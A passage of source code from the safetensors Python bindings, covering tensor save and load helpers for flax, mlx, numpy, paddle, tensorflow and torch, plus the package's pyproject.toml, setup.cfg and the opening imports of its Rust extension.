filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, Array]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.flax import save_file from jax import numpy as jnp tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ np_tensors = _jnp2np(tensors) return numpy.save_file(np_tensors, filename, metadata=metadata) def load(data: bytes) -> Dict[str, Array]: """ Loads a safetensors file into flax format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu Example: ```python from safetensors.flax import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = numpy.load(data) return _np2jnp(flat) def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]: """ Loads a safetensors file into flax format. Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors Returns: `Dict[str, Array]`: dictionary that contains name as key, value as `Array` Example: ```python from safetensors.flax import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="flax") as f: for k in f.keys(): result[k] = f.get_tensor(k) return result def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]: for k, v in numpy_dict.items(): numpy_dict[k] = jnp.array(v) return numpy_dict def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]: for k, v in jnp_dict.items(): jnp_dict[k] = np.asarray(v) return jnp_dict safetensors-0.5.2/bindings/python/py_src/safetensors/mlx.py000066400000000000000000000073751473753372300242270ustar00rootroot00000000000000import os from typing import Dict, Optional, Union import numpy as np import mlx.core as mx from safetensors import numpy, safe_open def save(tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, mx.array]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.mlx import save import mlx.core as mx tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} byte_data = save(tensors) ``` """ np_tensors = _mx2np(tensors) return numpy.save(np_tensors, metadata=metadata) def save_file( tensors: Dict[str, mx.array], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, mx.array]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.mlx import save_file import mlx.core as mx tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ np_tensors = _mx2np(tensors) return numpy.save_file(np_tensors, filename, metadata=metadata) def load(data: bytes) -> Dict[str, mx.array]: """ Loads a safetensors file into MLX format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` Example: ```python from safetensors.mlx import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = numpy.load(data) return _np2mx(flat) def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]: """ Loads a safetensors file into MLX format. Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors Returns: `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` Example: ```python from safetensors.flax import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="mlx") as f: for k in f.keys(): result[k] = f.get_tensor(k) return result def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]: for k, v in numpy_dict.items(): numpy_dict[k] = mx.array(v) return numpy_dict def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]: new_dict = {} for k, v in mx_dict.items(): new_dict[k] = np.asarray(v) return new_dict safetensors-0.5.2/bindings/python/py_src/safetensors/numpy.py000066400000000000000000000115111473753372300245620ustar00rootroot00000000000000import os import sys from typing import Dict, Optional, Union import numpy as np from safetensors import deserialize, safe_open, serialize, serialize_file def _tobytes(tensor: np.ndarray) -> bytes: if not _is_little_endian(tensor): tensor = tensor.byteswap(inplace=False) return tensor.tobytes() def save(tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensor_dict (`Dict[str, np.ndarray]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.numpy import save import numpy as np tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} byte_data = save(tensors) ``` """ flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()} serialized = serialize(flattened, metadata=metadata) result = bytes(serialized) return result def save_file( tensor_dict: Dict[str, np.ndarray], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensor_dict (`Dict[str, np.ndarray]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.numpy import save_file import numpy as np tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()} serialize_file(flattened, filename, metadata=metadata) def load(data: bytes) -> Dict[str, np.ndarray]: """ Loads a safetensors file into numpy format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu Example: ```python from safetensors.numpy import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = deserialize(data) return _view2np(flat) def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]: """ Loads a safetensors file into numpy format. Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors Returns: `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` Example: ```python from safetensors.numpy import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="np") as f: for k in f.keys(): result[k] = f.get_tensor(k) return result _TYPES = { "F64": np.float64, "F32": np.float32, "F16": np.float16, "I64": np.int64, "U64": np.uint64, "I32": np.int32, "U32": np.uint32, "I16": np.int16, "U16": np.uint16, "I8": np.int8, "U8": np.uint8, "BOOL": bool, } def _getdtype(dtype_str: str) -> np.dtype: return _TYPES[dtype_str] def _view2np(safeview) -> Dict[str, np.ndarray]: result = {} for k, v in safeview: dtype = _getdtype(v["dtype"]) arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"]) result[k] = arr return result def _is_little_endian(tensor: np.ndarray) -> bool: byteorder = tensor.dtype.byteorder if byteorder == "=": if sys.byteorder == "little": return True else: return False elif byteorder == "|": return True elif byteorder == "<": return True elif byteorder == ">": return False raise ValueError(f"Unexpected byte order {byteorder}") safetensors-0.5.2/bindings/python/py_src/safetensors/paddle.py000066400000000000000000000101171473753372300246440ustar00rootroot00000000000000import os from typing import Dict, Optional, Union import numpy as np import paddle from safetensors import numpy def save(tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, paddle.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.paddle import save import paddle tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} byte_data = save(tensors) ``` """ np_tensors = _paddle2np(tensors) return numpy.save(np_tensors, metadata=metadata) def save_file( tensors: Dict[str, paddle.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, paddle.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.paddle import save_file import paddle tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ np_tensors = _paddle2np(tensors) return numpy.save_file(np_tensors, filename, metadata=metadata) def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]: """ Loads a safetensors file into paddle format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on cpu Example: ```python from safetensors.paddle import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = numpy.load(data) return _np2paddle(flat, device) def load_file(filename: Union[str, os.PathLike], device="cpu") -> Dict[str, paddle.Tensor]: """ Loads a safetensors file into paddle format. Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors device (`Union[Dict[str, any], str]`, *optional*, defaults to `cpu`): The device where the tensors need to be located after load. available options are all regular paddle device locations Returns: `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` Example: ```python from safetensors.paddle import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ flat = numpy.load_file(filename) output = _np2paddle(flat, device) return output def _np2paddle(numpy_dict: Dict[str, np.ndarray], device: str = "cpu") -> Dict[str, paddle.Tensor]: for k, v in numpy_dict.items(): numpy_dict[k] = paddle.to_tensor(v, place=device) return numpy_dict def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]: for k, v in paddle_dict.items(): paddle_dict[k] = v.detach().cpu().numpy() return paddle_dict safetensors-0.5.2/bindings/python/py_src/safetensors/py.typed000066400000000000000000000000001473753372300245260ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/py_src/safetensors/tensorflow.py000066400000000000000000000074621473753372300256260ustar00rootroot00000000000000import os from typing import Dict, Optional, Union import numpy as np import tensorflow as tf from safetensors import numpy, safe_open def save(tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, tf.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.tensorflow import save import tensorflow as tf tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} byte_data = save(tensors) ``` """ np_tensors = _tf2np(tensors) return numpy.save(np_tensors, metadata=metadata) def save_file( tensors: Dict[str, tf.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ) -> None: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, tf.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.tensorflow import save_file import tensorflow as tf tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ np_tensors = _tf2np(tensors) return numpy.save_file(np_tensors, filename, metadata=metadata) def load(data: bytes) -> Dict[str, tf.Tensor]: """ Loads a safetensors file into tensorflow format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu Example: ```python from safetensors.tensorflow import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = numpy.load(data) return _np2tf(flat) def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]: """ Loads a safetensors file into tensorflow format. Args: filename (`str`, or `os.PathLike`)): The name of the file which contains the tensors Returns: `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` Example: ```python from safetensors.tensorflow import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="tf") as f: for k in f.keys(): result[k] = f.get_tensor(k) return result def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]: for k, v in numpy_dict.items(): numpy_dict[k] = tf.convert_to_tensor(v) return numpy_dict def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]: for k, v in tf_dict.items(): tf_dict[k] = v.numpy() return tf_dict safetensors-0.5.2/bindings/python/py_src/safetensors/torch.py000066400000000000000000000426361473753372300245450ustar00rootroot00000000000000import os import sys from collections import defaultdict from typing import Any, Dict, List, Optional, Set, Tuple, Union import torch from safetensors import deserialize, safe_open, serialize, serialize_file def storage_ptr(tensor: torch.Tensor) -> int: try: return tensor.untyped_storage().data_ptr() except Exception: # Fallback for torch==1.10 try: return tensor.storage().data_ptr() except NotImplementedError: # Fallback for meta storage return 0 def _end_ptr(tensor: torch.Tensor) -> int: if tensor.nelement(): stop = tensor.view(-1)[-1].data_ptr() + _SIZE[tensor.dtype] else: stop = tensor.data_ptr() return stop def storage_size(tensor: torch.Tensor) -> int: try: return tensor.untyped_storage().nbytes() except AttributeError: # Fallback for torch==1.10 try: return tensor.storage().size() * _SIZE[tensor.dtype] except NotImplementedError: # Fallback for meta storage # On torch >=2.0 this is the tensor size return tensor.nelement() * _SIZE[tensor.dtype] def _filter_shared_not_shared(tensors: List[Set[str]], state_dict: Dict[str, torch.Tensor]) -> List[Set[str]]: filtered_tensors = [] for shared in tensors: if len(shared) < 2: filtered_tensors.append(shared) continue areas = [] for name in shared: tensor = state_dict[name] areas.append((tensor.data_ptr(), _end_ptr(tensor), name)) areas.sort() _, last_stop, last_name = areas[0] filtered_tensors.append({last_name}) for start, stop, name in areas[1:]: if start >= last_stop: filtered_tensors.append({name}) else: filtered_tensors[-1].add(name) last_stop = stop return filtered_tensors def _find_shared_tensors(state_dict: Dict[str, torch.Tensor]) -> List[Set[str]]: tensors = defaultdict(set) for k, v in state_dict.items(): if v.device != torch.device("meta") and storage_ptr(v) != 0 and storage_size(v) != 0: # Need to add device as key because of multiple GPU. tensors[(v.device, storage_ptr(v), storage_size(v))].add(k) tensors = list(sorted(tensors.values())) tensors = _filter_shared_not_shared(tensors, state_dict) return tensors def _is_complete(tensor: torch.Tensor) -> bool: return tensor.data_ptr() == storage_ptr(tensor) and tensor.nelement() * _SIZE[tensor.dtype] == storage_size(tensor) def _remove_duplicate_names( state_dict: Dict[str, torch.Tensor], *, preferred_names: Optional[List[str]] = None, discard_names: Optional[List[str]] = None, ) -> Dict[str, List[str]]: if preferred_names is None: preferred_names = [] preferred_names = set(preferred_names) if discard_names is None: discard_names = [] discard_names = set(discard_names) shareds = _find_shared_tensors(state_dict) to_remove = defaultdict(list) for shared in shareds: complete_names = set([name for name in shared if _is_complete(state_dict[name])]) if not complete_names: raise RuntimeError( "Error while trying to find names to remove to save state dict, but found no suitable name to keep" f" for saving amongst: {shared}. None is covering the entire storage.Refusing to save/load the model" " since you could be storing much more memory than needed. Please refer to" " https://huggingface.co/docs/safetensors/torch_shared_tensors for more information. Or open an" " issue." ) keep_name = sorted(list(complete_names))[0] # Mechanism to preferentially select keys to keep # coming from the on-disk file to allow # loading models saved with a different choice # of keep_name preferred = complete_names.difference(discard_names) if preferred: keep_name = sorted(list(preferred))[0] if preferred_names: preferred = preferred_names.intersection(complete_names) if preferred: keep_name = sorted(list(preferred))[0] for name in sorted(shared): if name != keep_name: to_remove[keep_name].append(name) return to_remove def save_model( model: torch.nn.Module, filename: str, metadata: Optional[Dict[str, str]] = None, force_contiguous: bool = True ): """ Saves a given torch model to specified filename. This method exists specifically to avoid tensor sharing issues which are not allowed in `safetensors`. [More information on tensor sharing](../torch_shared_tensors) Args: model (`torch.nn.Module`): The model to save on disk. filename (`str`): The filename location to save the file metadata (`Dict[str, str]`, *optional*): Extra information to save along with the file. Some metadata will be added for each dropped tensors. This information will not be enough to recover the entire shared structure but might help understanding things force_contiguous (`boolean`, *optional*, defaults to True): Forcing the state_dict to be saved as contiguous tensors. This has no effect on the correctness of the model, but it could potentially change performance if the layout of the tensor was chosen specifically for that reason. """ state_dict = model.state_dict() to_removes = _remove_duplicate_names(state_dict) for kept_name, to_remove_group in to_removes.items(): for to_remove in to_remove_group: if metadata is None: metadata = {} if to_remove not in metadata: # Do not override user data metadata[to_remove] = kept_name del state_dict[to_remove] if force_contiguous: state_dict = {k: v.contiguous() for k, v in state_dict.items()} try: save_file(state_dict, filename, metadata=metadata) except ValueError as e: msg = str(e) msg += " Or use save_model(..., force_contiguous=True), read the docs for potential caveats." raise ValueError(msg) def load_model( model: torch.nn.Module, filename: Union[str, os.PathLike], strict: bool = True, device: Union[str, int] = "cpu" ) -> Tuple[List[str], List[str]]: """ Loads a given filename onto a torch model. This method exists specifically to avoid tensor sharing issues which are not allowed in `safetensors`. [More information on tensor sharing](../torch_shared_tensors) Args: model (`torch.nn.Module`): The model to load onto. filename (`str`, or `os.PathLike`): The filename location to load the file from. strict (`bool`, *optional*, defaults to True): Whether to fail if you're missing keys or having unexpected ones. When false, the function simply returns missing and unexpected names. device (`Union[str, int]`, *optional*, defaults to `cpu`): The device where the tensors need to be located after load. available options are all regular torch device locations. Returns: `(missing, unexpected): (List[str], List[str])` `missing` are names in the model which were not modified during loading `unexpected` are names that are on the file, but weren't used during the load. """ state_dict = load_file(filename, device=device) model_state_dict = model.state_dict() to_removes = _remove_duplicate_names(model_state_dict, preferred_names=state_dict.keys()) missing, unexpected = model.load_state_dict(state_dict, strict=False) missing = set(missing) for to_remove_group in to_removes.values(): for to_remove in to_remove_group: if to_remove not in missing: unexpected.append(to_remove) else: missing.remove(to_remove) if strict and (missing or unexpected): missing_keys = ", ".join([f'"{k}"' for k in sorted(missing)]) unexpected_keys = ", ".join([f'"{k}"' for k in sorted(unexpected)]) error = f"Error(s) in loading state_dict for {model.__class__.__name__}:" if missing: error += f"\n Missing key(s) in state_dict: {missing_keys}" if unexpected: error += f"\n Unexpected key(s) in state_dict: {unexpected_keys}" raise RuntimeError(error) return missing, unexpected def save(tensors: Dict[str, torch.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, torch.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.torch import save import torch tensors = {"embedding": torch.zeros((512, 1024)), "attention": torch.zeros((256, 256))} byte_data = save(tensors) ``` """ serialized = serialize(_flatten(tensors), metadata=metadata) result = bytes(serialized) return result def save_file( tensors: Dict[str, torch.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None, ): """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, torch.Tensor]`): The incoming tensors. Tensors need to be contiguous and dense. filename (`str`, or `os.PathLike`)): The filename we're saving into. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `None` Example: ```python from safetensors.torch import save_file import torch tensors = {"embedding": torch.zeros((512, 1024)), "attention": torch.zeros((256, 256))} save_file(tensors, "model.safetensors") ``` """ serialize_file(_flatten(tensors), filename, metadata=metadata) def load_file(filename: Union[str, os.PathLike], device: Union[str, int] = "cpu") -> Dict[str, torch.Tensor]: """ Loads a safetensors file into torch format. Args: filename (`str`, or `os.PathLike`): The name of the file which contains the tensors device (`Union[str, int]`, *optional*, defaults to `cpu`): The device where the tensors need to be located after load. available options are all regular torch device locations. Returns: `Dict[str, torch.Tensor]`: dictionary that contains name as key, value as `torch.Tensor` Example: ```python from safetensors.torch import load_file file_path = "./my_folder/bert.safetensors" loaded = load_file(file_path) ``` """ result = {} with safe_open(filename, framework="pt", device=device) as f: for k in f.keys(): result[k] = f.get_tensor(k) return result def load(data: bytes) -> Dict[str, torch.Tensor]: """ Loads a safetensors file into torch format from pure bytes. Args: data (`bytes`): The content of a safetensors file Returns: `Dict[str, torch.Tensor]`: dictionary that contains name as key, value as `torch.Tensor` on cpu Example: ```python from safetensors.torch import load file_path = "./my_folder/bert.safetensors" with open(file_path, "rb") as f: data = f.read() loaded = load(data) ``` """ flat = deserialize(data) return _view2torch(flat) # torch.float8 formats require 2.1; we do not support these dtypes on earlier versions _float8_e4m3fn = getattr(torch, "float8_e4m3fn", None) _float8_e5m2 = getattr(torch, "float8_e5m2", None) _SIZE = { torch.int64: 8, torch.float32: 4, torch.int32: 4, torch.bfloat16: 2, torch.float16: 2, torch.int16: 2, torch.uint8: 1, torch.int8: 1, torch.bool: 1, torch.float64: 8, _float8_e4m3fn: 1, _float8_e5m2: 1, } _TYPES = { "F64": torch.float64, "F32": torch.float32, "F16": torch.float16, "BF16": torch.bfloat16, "I64": torch.int64, # "U64": torch.uint64, "I32": torch.int32, # "U32": torch.uint32, "I16": torch.int16, # "U16": torch.uint16, "I8": torch.int8, "U8": torch.uint8, "BOOL": torch.bool, "F8_E4M3": _float8_e4m3fn, "F8_E5M2": _float8_e5m2, } def _getdtype(dtype_str: str) -> torch.dtype: return _TYPES[dtype_str] def _view2torch(safeview) -> Dict[str, torch.Tensor]: result = {} for k, v in safeview: dtype = _getdtype(v["dtype"]) if len(v["data"]) == 0: # Workaround because frombuffer doesn't accept zero-size tensors assert any(x == 0 for x in v["shape"]) arr = torch.empty(v["shape"], dtype=dtype) else: arr = torch.frombuffer(v["data"], dtype=dtype).reshape(v["shape"]) if sys.byteorder == "big": arr = torch.from_numpy(arr.numpy().byteswap(inplace=False)) result[k] = arr return result def _tobytes(tensor: torch.Tensor, name: str) -> bytes: if tensor.layout != torch.strided: raise ValueError( f"You are trying to save a sparse tensor: `{name}` which this library does not support." " You can make it a dense tensor before saving with `.to_dense()` but be aware this might" " make a much larger file than needed." ) if not tensor.is_contiguous(): raise ValueError( f"You are trying to save a non contiguous tensor: `{name}` which is not allowed. It either means you" " are trying to save tensors which are reference of each other in which case it's recommended to save" " only the full tensors, and reslice at load time, or simply call `.contiguous()` on your tensor to" " pack it before saving." ) if tensor.device.type != "cpu": # Moving tensor to cpu before saving tensor = tensor.to("cpu") import ctypes import numpy as np # When shape is empty (scalar), np.prod returns a float # we need a int for the following calculations length = int(np.prod(tensor.shape).item()) bytes_per_item = _SIZE[tensor.dtype] total_bytes = length * bytes_per_item ptr = tensor.data_ptr() if ptr == 0: return b"" newptr = ctypes.cast(ptr, ctypes.POINTER(ctypes.c_ubyte)) data = np.ctypeslib.as_array(newptr, (total_bytes,)) # no internal copy if sys.byteorder == "big": NPDTYPES = { torch.int64: np.int64, torch.float32: np.float32, torch.int32: np.int32, # XXX: This is ok because both have the same width torch.bfloat16: np.float16, torch.float16: np.float16, torch.int16: np.int16, torch.uint8: np.uint8, torch.int8: np.int8, torch.bool: bool, torch.float64: np.float64, # XXX: This is ok because both have the same width and byteswap is a no-op anyway _float8_e4m3fn: np.uint8, _float8_e5m2: np.uint8, } npdtype = NPDTYPES[tensor.dtype] # Not in place as that would potentially modify a live running model data = data.view(npdtype).byteswap(inplace=False) return data.tobytes() def _flatten(tensors: Dict[str, torch.Tensor]) -> Dict[str, Dict[str, Any]]: if not isinstance(tensors, dict): raise ValueError(f"Expected a dict of [str, torch.Tensor] but received {type(tensors)}") invalid_tensors = [] for k, v in tensors.items(): if not isinstance(v, torch.Tensor): raise ValueError(f"Key `{k}` is invalid, expected torch.Tensor but received {type(v)}") if v.layout != torch.strided: invalid_tensors.append(k) if invalid_tensors: raise ValueError( f"You are trying to save a sparse tensors: `{invalid_tensors}` which this library does not support." " You can make it a dense tensor before saving with `.to_dense()` but be aware this might" " make a much larger file than needed." ) shared_pointers = _find_shared_tensors(tensors) failing = [] for names in shared_pointers: if len(names) > 1: failing.append(names) if failing: raise RuntimeError( f""" Some tensors share memory, this will lead to duplicate memory on disk and potential differences when loading them again: {failing}. A potential way to correctly save your model is to use `save_model`. More information at https://huggingface.co/docs/safetensors/torch_shared_tensors """ ) return { k: { "dtype": str(v.dtype).split(".")[-1], "shape": v.shape, "data": _tobytes(v, k), } for k, v in tensors.items() } safetensors-0.5.2/bindings/python/pyproject.toml000066400000000000000000000045631473753372300221320ustar00rootroot00000000000000[project] name = 'safetensors' requires-python = '>=3.7' authors = [ {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'} ] classifiers = [ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "Intended Audience :: Education", "Intended Audience :: Science/Research", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Topic :: Scientific/Engineering :: Artificial Intelligence", "Typing :: Typed", ] dynamic = [ 'description', 'license', 'readme', 'version', ] [project.urls] Homepage = 'https://github.com/huggingface/safetensors' Source = 'https://github.com/huggingface/safetensors' [project.optional-dependencies] numpy = ["numpy>=1.21.6"] torch = [ "safetensors[numpy]", "torch>=1.10", ] tensorflow = [ "safetensors[numpy]", "tensorflow>=2.11.0", ] # pinning tf version 2.11.0 for doc-builder pinned-tf = [ "safetensors[numpy]", "tensorflow==2.18.0", ] jax = [ "safetensors[numpy]", "flax>=0.6.3", "jax>=0.3.25", "jaxlib>=0.3.25", ] mlx = [ "mlx>=0.0.9", ] paddlepaddle = [ "safetensors[numpy]", "paddlepaddle>=2.4.1", ] quality = [ "black==22.3", # after updating to black 2023, also update Python version in pyproject.toml to 3.7 "click==8.0.4", "isort>=5.5.4", "flake8>=3.8.3", ] testing = [ "safetensors[numpy]", "h5py>=3.7.0", "huggingface_hub>=0.12.1", "setuptools_rust>=1.5.2", "pytest>=7.2.0", "pytest-benchmark>=4.0.0", # "python-afl>=0.7.3", "hypothesis>=6.70.2", ] all = [ "safetensors[torch]", "safetensors[numpy]", "safetensors[pinned-tf]", "safetensors[jax]", "safetensors[paddlepaddle]", "safetensors[quality]", "safetensors[testing]", ] dev = [ "safetensors[all]", ] [build-system] requires = ["maturin>=1.0,<2.0"] build-backend = "maturin" [tool.maturin] python-source = "py_src" module-name = "safetensors._safetensors_rust" bindings = 'pyo3' features = ["pyo3/extension-module"] [tool.black] line-length = 119 target-version = ['py35'] [tool.setuptools.dynamic] readme = {file = ["README.rst"]} safetensors-0.5.2/bindings/python/setup.cfg000066400000000000000000000015731473753372300210350ustar00rootroot00000000000000[isort] default_section = FIRSTPARTY ensure_newline_before_comments = True force_grid_wrap = 0 include_trailing_comma = True known_first_party = transformers known_third_party = absl conllu datasets elasticsearch fairseq faiss-cpu fastprogress fire fugashi git h5py matplotlib nltk numpy packaging pandas PIL psutil pytest pytorch_lightning rouge_score sacrebleu seqeval sklearn streamlit tensorboardX tensorflow tensorflow_datasets timeout_decorator torch torchaudio torchtext torchvision torch_xla tqdm paddlepaddle line_length = 119 lines_after_imports = 2 multi_line_output = 3 use_parentheses = True [flake8] ignore = E203, E501, E741, W503, W605 max-line-length = 119 [tool:pytest] doctest_optionflags=NUMBER NORMALIZE_WHITESPACE ELLIPSISsafetensors-0.5.2/bindings/python/src/000077500000000000000000000000001473753372300177755ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/src/lib.rs000066400000000000000000001273331473753372300211220ustar00rootroot00000000000000#![deny(missing_docs)] //! Dummy doc use memmap2::{Mmap, MmapOptions}; use pyo3::exceptions::{PyException, PyFileNotFoundError}; use pyo3::prelude::*; use pyo3::sync::GILOnceCell; use pyo3::types::IntoPyDict; use pyo3::types::{PyBool, PyByteArray, PyBytes, PyDict, PyList, PySlice}; use pyo3::Bound as PyBound; use pyo3::{intern, PyErr}; use 